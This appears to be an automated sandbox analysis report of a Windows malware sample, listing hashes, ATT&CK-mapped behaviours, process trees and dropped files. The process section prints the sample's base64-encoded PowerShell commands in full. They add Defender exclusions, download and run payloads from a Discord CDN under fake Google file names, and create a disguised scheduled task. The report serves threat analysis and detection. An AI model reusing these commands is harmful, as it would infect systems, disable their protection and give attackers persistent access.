38415959c6c2be67f3c96932dbfaa903b4d650d00b003c5b59340cb692560a51

General

Target

c17c0259ca58b7412fbf9ec5a75e3ecc.exe
Size

158KB
MD5

c17c0259ca58b7412fbf9ec5a75e3ecc
SHA1

13d2cc140cec0774a4daeb75dbf1333cf7bdf4ac
SHA256

38415959c6c2be67f3c96932dbfaa903b4d650d00b003c5b59340cb692560a51
SHA512

e428f6355c9fa60b891091e0a629f651968651e8f641e9d7759b3e197a498c88cbc657a8821f8f7abacdf72e1624a2472fead3a0bc116d36c87713f28b9b9ebe
SSDEEP

3072:+8bupux+SWv5NbwHw66vW2cSkkqFHhDMTYD8WUyy7GeLNcXOh:/2vcSkkqXDjDy3LNUOh

Score

8^/10

Malware Config

Signatures

Executes dropped EXE 4 IoCs

Processes:

unzip.exeunzip.exeunzip.exeunzip.exe

pid process

1340 unzip.exe
1984 unzip.exe
556 unzip.exe
520 unzip.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

3 ip-api.com

pid	process
1340	unzip.exe
1984	unzip.exe
556	unzip.exe
520	unzip.exe

flow	ioc
3	ip-api.com

Drops file in System32 directory 4 IoCs

Processes:

unzip.exeunzip.exeunzip.exeunzip.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	unzip.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	unzip.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	unzip.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	unzip.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1628 1044 WerFault.exe c17c0259ca58b7412fbf9ec5a75e3ecc.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1012 schtasks.exe

pid	pid_target	process	target process
1628	1044	WerFault.exe	c17c0259ca58b7412fbf9ec5a75e3ecc.exe

pid	process
1012	schtasks.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

c17c0259ca58b7412fbf9ec5a75e3ecc.exeunzip.exeunzip.exeunzip.exeunzip.exe

pid	process
1044	c17c0259ca58b7412fbf9ec5a75e3ecc.exe
1044	c17c0259ca58b7412fbf9ec5a75e3ecc.exe
1044	c17c0259ca58b7412fbf9ec5a75e3ecc.exe
1044	c17c0259ca58b7412fbf9ec5a75e3ecc.exe
520	unzip.exe
1984	unzip.exe
1340	unzip.exe
556	unzip.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

c17c0259ca58b7412fbf9ec5a75e3ecc.exeunzip.exeunzip.exeunzip.exeunzip.exe

description	pid	process
Token: SeDebugPrivilege	1044	c17c0259ca58b7412fbf9ec5a75e3ecc.exe
Token: SeDebugPrivilege	520	unzip.exe
Token: SeDebugPrivilege	1984	unzip.exe
Token: SeDebugPrivilege	1340	unzip.exe
Token: SeDebugPrivilege	556	unzip.exe

Suspicious use of WriteProcessMemory 31 IoCs

Processes:

unzip.execmd.execmd.exec17c0259ca58b7412fbf9ec5a75e3ecc.exeunzip.execmd.exe

description	pid	process	target process
PID 1340 wrote to memory of 1772	1340	unzip.exe	cmd.exe
PID 1340 wrote to memory of 1772	1340	unzip.exe	cmd.exe
PID 1340 wrote to memory of 1772	1340	unzip.exe	cmd.exe
PID 1340 wrote to memory of 1772	1340	unzip.exe	cmd.exe
PID 1772 wrote to memory of 1728	1772	cmd.exe	netsh.exe
PID 1772 wrote to memory of 1728	1772	cmd.exe	netsh.exe
PID 1772 wrote to memory of 1728	1772	cmd.exe	netsh.exe
PID 1772 wrote to memory of 1728	1772	cmd.exe	netsh.exe
PID 1340 wrote to memory of 1736	1340	unzip.exe	cmd.exe
PID 1340 wrote to memory of 1736	1340	unzip.exe	cmd.exe
PID 1340 wrote to memory of 1736	1340	unzip.exe	cmd.exe
PID 1340 wrote to memory of 1736	1340	unzip.exe	cmd.exe
PID 1736 wrote to memory of 436	1736	cmd.exe	netsh.exe
PID 1736 wrote to memory of 436	1736	cmd.exe	netsh.exe
PID 1736 wrote to memory of 436	1736	cmd.exe	netsh.exe
PID 1736 wrote to memory of 436	1736	cmd.exe	netsh.exe
PID 1044 wrote to memory of 1628	1044	c17c0259ca58b7412fbf9ec5a75e3ecc.exe	WerFault.exe
PID 1044 wrote to memory of 1628	1044	c17c0259ca58b7412fbf9ec5a75e3ecc.exe	WerFault.exe
PID 1044 wrote to memory of 1628	1044	c17c0259ca58b7412fbf9ec5a75e3ecc.exe	WerFault.exe
PID 520 wrote to memory of 1756	520	unzip.exe	cmd.exe
PID 520 wrote to memory of 1756	520	unzip.exe	cmd.exe
PID 520 wrote to memory of 1756	520	unzip.exe	cmd.exe
PID 520 wrote to memory of 1756	520	unzip.exe	cmd.exe
PID 1756 wrote to memory of 1012	1756	cmd.exe	schtasks.exe
PID 1756 wrote to memory of 1012	1756	cmd.exe	schtasks.exe
PID 1756 wrote to memory of 1012	1756	cmd.exe	schtasks.exe
PID 1756 wrote to memory of 1012	1756	cmd.exe	schtasks.exe
PID 520 wrote to memory of 1852	520	unzip.exe	cmd.exe
PID 520 wrote to memory of 1852	520	unzip.exe	cmd.exe
PID 520 wrote to memory of 1852	520	unzip.exe	cmd.exe
PID 520 wrote to memory of 1852	520	unzip.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\c17c0259ca58b7412fbf9ec5a75e3ecc.exe
"C:\Users\Admin\AppData\Local\Temp\c17c0259ca58b7412fbf9ec5a75e3ecc.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1044

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1044 -s 1200
2⤵
- Program crash
PID:1628

C:\ProgramData\Google\unzip.exe
"C:\ProgramData\Google\unzip.exe" cmd.exe /c netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8;cmd.exe /c netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=2
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1340

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8
2⤵
- Suspicious use of WriteProcessMemory
PID:1772

C:\Windows\SysWOW64\netsh.exe
netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8
3⤵
PID:1728

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=2
2⤵
- Suspicious use of WriteProcessMemory
PID:1736

C:\Windows\SysWOW64\netsh.exe
netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=2
3⤵
PID:436

C:\ProgramData\Google\unzip.exe
"C:\ProgramData\Google\unzip.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcAOAAxADQANQAyADMAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcAOAAxADQANQAyADQAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcAOAAzADEANAA1ADYAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcANwAzADUANQAwADMAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAJwA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAEcAbwBvAGcAbABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBJAG4AcwB0AGEAbABsAFUAdABpAGwALgBlAHgAZQAnADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgACcAcwBvAGYAdAB3AGEAcgBlAF8AcgBlAHAAbwByAHQAZQByAF8AdABvAG8AbAAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAJwA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFUAcwBlAHIAcwBcACoAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwASQBOAGUAdABDAGEAYwBoAGUAXABJAEUAJwA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIAAnAHUAbgB6AGkAcAAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBjAG0AZAAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBkAHcAbQAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFUAcwBlAHIAcwBcACoAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAnAA==
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1984

C:\ProgramData\Google\unzip.exe
"C:\ProgramData\Google\unzip.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIAMQA5ADQAOQA1ADgANQAyADQAMgA5ADgAMAAzADYANgAvADEAMAAyADYAOQAwADEANAA4ADQANgA4ADUANwA2ADYANgA3ADYALwBvAGIAaQBlAHoAbgBuAGUALgBtAHMAaQAnACwAJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABHAG8AbwBnAGwAZQBcAHMAbwBmAHQAdwBhAHIAZQBfAHIAZQBwAG8AcgB0AGUAcgBfAHQAbwBvAGwALgBlAHgAZQAnACkAOwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABHAG8AbwBnAGwAZQBcAHMAbwBmAHQAdwBhAHIAZQBfAHIAZQBwAG8AcgB0AGUAcgBfAHQAbwBvAGwALgBlAHgAZQA=
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:556

C:\ProgramData\Google\unzip.exe
"C:\ProgramData\Google\unzip.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIAMQA5ADQAOQA1ADgANQAyADQAMgA5ADgAMAAzADYANgAvADEAMAAyADMAOQA0ADkANgAzADUAMQA5ADIAMQAxADEAMQA2ADQALwBjAG0AZAAuAG0AcwBpACcALAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAEcAbwBvAGcAbABlAFwARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUALgBlAHgAZQAnACkAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgAxADkANAA5ADUAOAA1ADIANAAyADkAOAAwADMANgA2AC8AMQAwADIANgA5ADAAMAA2ADIANAA4ADgAMgA4ADEANQAwADcANwAvAHgAbQBsAG8AMgAuAG0AcwBpACcALAAnAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwALgB4AG0AbAAnACkAOwBjAG0AZAAuAGUAeABlACAALwBjACAAcwBjAGgAdABhAHMAawBzACAALwBjAHIAZQBhAHQAZQAgAC8AeABtAGwAIAAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwALgB4AG0AbAAiACAALwB0AG4AIAAiAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsAIgAgAC8AZgA7AGMAbQBkAC4AZQB4AGUAIAAvAGMAIABkAGUAbAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXAAuAHgAbQBsACIA
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:520

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c schtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1756

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask /f
3⤵
- Creates scheduled task(s)
PID:1012

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del C:\Windows\Temp\.xml
2⤵
PID:1852

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Google\unzip.exe
Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
C:\ProgramData\Google\unzip.exe
Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
C:\ProgramData\Google\unzip.exe
Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
C:\ProgramData\Google\unzip.exe
Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
memory/436-71-0x0000000000000000-mapping.dmp

Download
memory/520-82-0x0000000073DF0000-0x000000007439B000-memory.dmp

Filesize
5.7MB

Download
memory/520-63-0x0000000073DF0000-0x000000007439B000-memory.dmp

Filesize
5.7MB

Download
memory/520-76-0x0000000073DF0000-0x000000007439B000-memory.dmp

Filesize
5.7MB

Download
memory/556-77-0x0000000073DF0000-0x000000007439B000-memory.dmp

Filesize
5.7MB

Download
memory/556-66-0x0000000073DF0000-0x000000007439B000-memory.dmp

Filesize
5.7MB

Download
memory/556-78-0x0000000073DF0000-0x000000007439B000-memory.dmp

Filesize
5.7MB

Download
memory/1012-80-0x0000000000000000-mapping.dmp

Download
memory/1044-54-0x0000000000B50000-0x0000000000B7E000-memory.dmp

Filesize
184KB

Download
memory/1340-58-0x0000000075071000-0x0000000075073000-memory.dmp

Filesize
8KB

Download
memory/1340-64-0x0000000073DF0000-0x000000007439B000-memory.dmp

Filesize
5.7MB

Download
memory/1340-73-0x0000000073DF0000-0x000000007439B000-memory.dmp

Filesize
5.7MB

Download
memory/1628-75-0x0000000000000000-mapping.dmp

Download
memory/1728-68-0x0000000000000000-mapping.dmp

Download
memory/1736-70-0x0000000000000000-mapping.dmp

Download
memory/1756-79-0x0000000000000000-mapping.dmp

Download
memory/1772-67-0x0000000000000000-mapping.dmp

Download
memory/1852-81-0x0000000000000000-mapping.dmp

Download
memory/1984-65-0x0000000073DF0000-0x000000007439B000-memory.dmp

Filesize
5.7MB

Download
memory/1984-74-0x0000000073DF0000-0x000000007439B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads